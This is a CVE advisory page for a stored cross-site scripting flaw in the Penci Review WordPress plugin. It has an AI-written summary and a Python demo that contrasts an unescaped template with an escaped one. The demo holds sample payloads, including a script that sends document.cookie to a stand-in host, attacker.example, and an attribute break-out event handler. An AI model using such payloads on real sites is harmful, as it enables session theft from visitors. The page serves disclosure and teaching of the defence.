CVE-2026-24600
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Review penci-review allows Stored XSS. This issue affects Penci Review: from n/a through <= 3.5.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in Penci Review plugin (≤3.5) allows authenticated attackers to inject arbitrary scripts, enabling mass-exploit campaigns against WordPress sites.
Vulnerability
Overview
The Penci Review plugin for WordPress versions 3.5 and earlier contains a Stored Cross-Site Scripting (XSS) vulnerability due to improper neutralization of user-supplied input during web page generation [1]. This flaw allows an authenticated attacker with contributor-level access or higher to inject malicious scripts that are stored on the server and executed in the browsers of visitors.
Exploitation
Details
To exploit this vulnerability, an attacker must first authenticate as a user with the ability to submit or edit reviews (typically a contributor or above). The attacker then crafts a review containing a malicious payload, such as JavaScript code, which the plugin does not properly sanitize before storing it. When the stored review is later rendered into a page, the payload executes as a stored XSS attack [1]. No additional user interaction is required for the initial injection; the payload is triggered whenever any visitor (including an administrator) views the affected page.
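The following is an added illustration, not code from Penci Review or its vendor, of the mechanism described above: a review field is stored verbatim and later interpolated into HTML without neutralization. The field names, the template and the two payloads are constructed assumptions for this example; the point is that the same stored input is harmless under the escaped template and active under the unescaped one.

```python
"""Added example (not the plugin's code): unescaped review fields become stored XSS.

The field names (title, score, body), the template and the payloads are assumptions
constructed for this illustration; nothing here is taken from Penci Review.
"""
import html

# Constructed attacker-controlled review, as a contributor-level user could submit it.
MALICIOUS_REVIEW = {
    "title": "Great product<script>document.location='https://attacker.example/?c='+document.cookie</script>",
    "score": '5" onmouseover="alert(document.domain)',
    "body": "Solid build quality.",
}

# Constructed benign review for comparison.
BENIGN_REVIEW = {"title": "Great product", "score": "5", "body": "Solid build quality."}


def render_vulnerable(review: dict) -> str:
    """Assumed template that interpolates stored fields without neutralization.

    This is the CWE-79 pattern: whatever was stored is emitted verbatim into the
    page, so a payload saved once runs for every visitor who loads the review.
    """
    return (
        f'<div class="review" data-score="{review["score"]}">'
        f'<h3>{review["title"]}</h3>'
        f'<p>{review["body"]}</p></div>'
    )


def esc(value) -> str:
    """Escape <, >, &, " and ' so the value is inert in both a text node and a
    double-quoted attribute. In a WordPress plugin the equivalents are esc_html()
    / esc_attr(), or wp_kses_post() where limited HTML must be preserved."""
    return html.escape(str(value), quote=True)


def render_hardened(review: dict) -> str:
    """Same template with context-appropriate output escaping on every field."""
    return (
        f'<div class="review" data-score="{esc(review["score"])}">'
        f'<h3>{esc(review["title"])}</h3>'
        f'<p>{esc(review["body"])}</p></div>'
    )


def contains_active_content(fragment: str) -> bool:
    """Crude oracle for the demo: does the rendered HTML still contain a script
    element or the attribute break-out event handler? Lower-cased substring check only."""
    low = fragment.lower()
    return "<script" in low or '" onmouseover=' in low


if __name__ == "__main__":
    for name, review in (("benign", BENIGN_REVIEW), ("malicious", MALICIOUS_REVIEW)):
        for label, renderer in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
            out = renderer(review)
            print(f"{name}/{label}: active content = {contains_active_content(out)}")
            print("   ", out)
```

The score field shows why escaping has to be chosen per output context: the payload never uses `<` at all, it closes the attribute with a double quote and adds an event handler, which `html.escape(quote=True)` neutralizes along with the script element in the title.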
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser. This can be used to steal session cookies, redirect users to phishing sites, deface the website, or inject advertisements [1]. The advisory notes that such vulnerabilities are frequently used in mass-exploit campaigns targeting thousands of WordPress sites regardless of size or popularity [1].
Mitigation
The vendor had not released a patched version at the time of publication, so the immediate recommendation is to update the plugin as soon as a fixed release is available. Until then, site owners should restrict which accounts hold contributor-level access (and therefore the ability to submit or edit reviews), or disable the plugin, or consult their hosting provider or web developer for alternative mitigations [1]. The CVSS score of 6.5 (Medium) reflects the requirement for authenticated access, weighed against the potential for widespread automated exploitation.
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Penci Review (penci-review), version range: <= 3.5
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions: no linked articles in our index yet.